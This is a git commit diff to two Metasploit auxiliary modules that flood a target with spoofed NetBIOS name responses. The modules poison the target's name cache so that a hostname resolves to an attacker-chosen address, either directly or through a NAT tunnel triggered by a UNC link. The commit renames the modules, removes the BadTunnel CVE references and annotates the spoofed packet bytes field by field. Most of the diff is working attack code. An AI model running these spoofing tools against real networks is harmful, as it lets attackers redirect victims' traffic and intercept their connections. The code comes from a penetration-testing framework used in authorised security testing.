Rework to clarify that this a brute force spoof, unrelated to BadTunnel

hdm · hdm · commit ce7c6496dda1 · 2016-06-19T13:36:39.000-05:00
diff --git a/modules/auxiliary/admin/netbios/netbios_spoof.rb b/modules/auxiliary/admin/netbios/netbios_spoof.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'NetBIOS "BadTunnel" Name Poisoner (Direct)',
+      'Name'        => 'NetBIOS Response Brute Force Spoof (Direct)',
       'Description'    => %q{
           This module continuously spams NetBIOS responses to a target for given hostname,
         causing the target to cache a malicious address for this name. On high-speed local
@@ -21,19 +21,11 @@ def initialize
         rates for a successful attack.
       },
       'Authors'     => [
+        'vvalien',   # Metasploit Module (post)
         'hdm',       # Metasploit Module
-        'tombkeeper' # Vulnerability Discovery
+        'tombkeeper' # Related Work
       ],
       'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/'],
-          ['CVE', '2016-3213'],
-          ['MSB', 'MS16-063'],
-          ['CVE', '2016-3236'],
-          ['MSB', 'MS16-077']
-        ],
-      'DisclosureDate' => 'Jun 14 2016'
     )
 
     register_options(
@@ -49,17 +41,27 @@ def initialize
 
   def netbios_spam
     payload =
-      "\xff\xff" + # TXID
-      "\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00\x20" +
-      Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
-      "\x00\x00\x20\x00\x01\x00\xff\xff\xff\x00\x06\x00\x00" +
-      Rex::Socket.addr_aton(@fake_addr)
+        "\xff\xff"   + # TX ID (will brute force this)
+        "\x85\x00"   + # Flags = response + authoratative + recursion desired
+        "\x00\x00"   + # Questions = 0
+        "\x00\x01"   + # Answer RRs = 1
+        "\x00\x00"   + # Authority RRs = 0
+        "\x00\x00"   + # Additional RRs = 0
+        "\x20"       +
+        Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
+        "\x00"       +
+        "\x00\x20"   + # Type = NB 
+        "\x00\x01"   + # Class = IN
+        "\x00\x04\x93\xe0" + # TTL long time
+        "\x00\x06"   + # Datalength = 6
+        "\x00\x00"   + # Flags B-node, unique
+        Rex::Socket.addr_aton(@fake_addr)
 
     stime = Time.now.to_f
     pcnt = 0
     pps  = 0
 
-    print_status("BadTunnel:  >> Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
+    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
 
     live = true
     while live
@@ -74,14 +76,14 @@ def netbios_spam
             sleep(0.01)
           end
         rescue Errno::ECONNREFUSED
-          print_error("BadTunnel:  >> Error: Target sent us an ICMP port unreachable, port is likely closed")
+          print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
           live = false
           break
         end
       end
     end
 
-    print_status("BadTunnel:  >> Cleaning up...")
+    print_status("Cleaning up...")
   end
 
   def run
diff --git a/modules/auxiliary/server/netbios_spoof_nat.rb b/modules/auxiliary/server/netbios_spoof_nat.rb
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'NetBIOS "BadTunnel" Service',
+      'Name'        => 'NetBIOS Response Brute Force Spoof (NAT Tunnel)',
       'Description'    => %q{
           This module listens for a NetBIOS name request and then continuously spams
         NetBIOS responses to a target for given hostname, causing the target to cache
@@ -25,18 +25,11 @@ def initialize
         to access a UNC link pointing to the same address (HTML, Office attachment, etc).
       },
       'Authors'     => [
-        'hdm',       # Metasploit Module
-        'tombkeeper' # Vulnerability Discovery
+        'vvalien',   # Metasploit Module (post)
+        'hdm',       # Metasploit Module 
+        'tombkeeper' # Related Work
       ],
       'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          ['URL', 'http://xlab.tencent.com/en/2016/06/17/BadTunnel-A-New-Hope/'],
-          ['CVE', '2016-3213'],
-          ['MSB', 'MS16-063'],
-          ['CVE', '2016-3236'],
-          ['MSB', 'MS16-077']
-        ],
       'Actions'     =>
         [
           [ 'Service' ]
@@ -46,7 +39,6 @@ def initialize
           'Service'
         ],
       'DefaultAction'  => 'Service',
-      'DisclosureDate' => 'Jun 14 2016'
     )
 
     register_options(
@@ -65,7 +57,6 @@ def netbios_service
     # MacOS X workaround
     ::Socket.do_not_reverse_lookup = true
 
-    print_status("NetBIOS 'BadTunnel' service is initializing")
     @sock = ::UDPSocket.new()
     @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
     @sock.bind(datastore['SRVHOST'], @port)
@@ -74,7 +65,7 @@ def netbios_service
     @fake_name = datastore['NBNAME']
     @fake_addr = datastore['NBADDR']
 
-    print_status("BadTunnel: Listening for NetBIOS requests...")
+    print_status("Listening for NetBIOS requests...")
 
     begin
       loop do
@@ -86,33 +77,44 @@ def netbios_service
         break
       end
 
-      print_status("BadTunnel:  >> Received a NetBIOS request from #{@targ_addr}:#{@targ_port}")
+      # TODO: Seed our counter based on the TXID of this request
+      print_status("Received a NetBIOS request from #{@targ_addr}:#{@targ_port}")
       @sock.connect(@targ_addr, @targ_port)
 
       netbios_spam
 
     rescue ::Interrupt
       raise $!
     rescue ::Exception => e
-      print_error("BadTunnel: Error #{e.class} #{e} #{e.backtrace}")
+      print_error("Error #{e.class} #{e} #{e.backtrace}")
     ensure
-      @sock.close
+      @sock.close if @sock
     end
   end
 
   def netbios_spam
     payload =
-      "\xff\xff" + # TXID
-      "\x85\x00\x00\x00\x00\x01\x00\x00\x00\x00\x20" +
-      Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
-      "\x00\x00\x20\x00\x01\x00\xff\xff\xff\x00\x06\x00\x00" +
-      Rex::Socket.addr_aton(@fake_addr)
+        "\xff\xff"   + # TX ID (will brute force this)
+        "\x85\x00"   + # Flags = response + authoratative + recursion desired
+        "\x00\x00"   + # Questions = 0
+        "\x00\x01"   + # Answer RRs = 1
+        "\x00\x00"   + # Authority RRs = 0
+        "\x00\x00"   + # Additional RRs = 0
+        "\x20"       +
+        Rex::Proto::SMB::Utils.nbname_encode( [@fake_name.upcase].pack("A15") + "\x00" ) +
+        "\x00"       +
+        "\x00\x20"   + # Type = NB 
+        "\x00\x01"   + # Class = IN
+        "\x00\x04\x93\xe0" + # TTL long time
+        "\x00\x06"   + # Datalength = 6
+        "\x00\x00"   + # Flags B-node, unique
+        Rex::Socket.addr_aton(@fake_addr)
 
     stime = Time.now.to_f
     pcnt = 0
     pps  = 0
 
-    print_status("BadTunnel:  >> Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
+    print_status("Spamming NetBIOS responses for #{@fake_name}/#{@fake_addr} to #{@targ_addr}:#{@targ_port} at #{@targ_rate}/pps...")
 
     live = true
     while live
@@ -127,20 +129,16 @@ def netbios_spam
             sleep(0.01)
           end
         rescue Errno::ECONNREFUSED
-          print_error("BadTunnel:  >> Error: Target sent us an ICMP port unreachable, port is likely closed")
+          print_error("Error: Target sent us an ICMP port unreachable, port is likely closed")
           live = false
           break
         end
       end
     end
-
-    print_status("BadTunnel:  >> Cleaning up...")
   end
 
   def run
-    loop do
-      netbios_service
-    end
+    loop { netbios_service }
   end
 
 end
